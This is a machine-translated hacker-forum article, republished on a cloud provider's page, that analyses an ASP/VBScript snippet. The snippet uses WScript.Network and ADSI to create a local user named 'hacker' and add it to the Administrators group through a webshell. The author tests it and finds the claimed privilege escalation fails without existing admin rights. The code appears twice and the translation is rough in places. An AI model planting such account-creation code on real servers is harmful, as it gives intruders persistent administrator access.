Adding superuser ASP code analysis in legend

Source: Internet
Author: User
From lake2
This stuff is gaining popularity. If you do not know it, read the article "add a Super User. ASP code.

The author also said, "the code is correct, but it rarely succeeds. It depends on luck." I tried it on webshell and failed. Remove the error tolerance statement because the error is "insufficient Permissions ". It's okay today. Let's analyze it. Maybe ...... Hey.

The key to his code is this:

Set Lp = server. Createobject ("wscript. Network ")
Oz = "winnt: //" & LP. computername
Set Ob = GetObject (OZ)
Set OE = GetObject (OZ & "/administrators, group ")
Set OD = OB. Create ("user", username)
OD. setpassword passwd
OD. setinfo
Oe. Add Oz & "/" & Username

It is nothing more than creating a wscript. Network object in ASP. Use this object to add users and promote them to administrators. According to their statement, the Local Privilege Escalation Vulnerability of the. Network object was exploited (they said this was not announced by MS ). Well, I will make the code into a vbs script file and get it through the command line.

Test. VBE (VBE is better than vbs; vbs is subject to many restrictions)
Set Lp = Createobject ("wscript. Network ")
Oz = "winnt: //" & LP. computername
Set Ob = GetObject (OZ)
Set OE = GetObject (OZ & "/administrators, group ")
Set OD = OB. Create ("user", "hacker ")
OD. setpassword Test
OD. setinfo
Oe. Add Oz & "/" & "hacker"

Generate a hacker user with the admin permission. If the user permission is executed, the following error occurs: access is denied. It seems that the permission is not enough, that is, the so-called ". Network object local permission Escalation Vulnerability" that is not published by Ms does not exist-at least on my XP SP1. You can also save the above Code as VBE to get the user permission. Next, try to see if this bug exists in other systems. However, this ASP will rarely succeed.

The last time I went back to the login coast, I told me that if IIS had enabled ASP authentication, I could. I disabled the anonymous access to IIS locally. This script can work. However, your browser has administrator permissions. I think it is clear that anonymous access is disabled. Why didn't a dialog box pop up asking you to lose your user password? Haha, you naturally integrate Windows Basic verification locally. At this time, I am the Administrator. Of course, ASP also inherits the admin permission. I don't know if the author has an error here?

I think this legend is wrong. Thank you for your advice. Let's talk about it first. You are not allowed to face it. ^_^

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.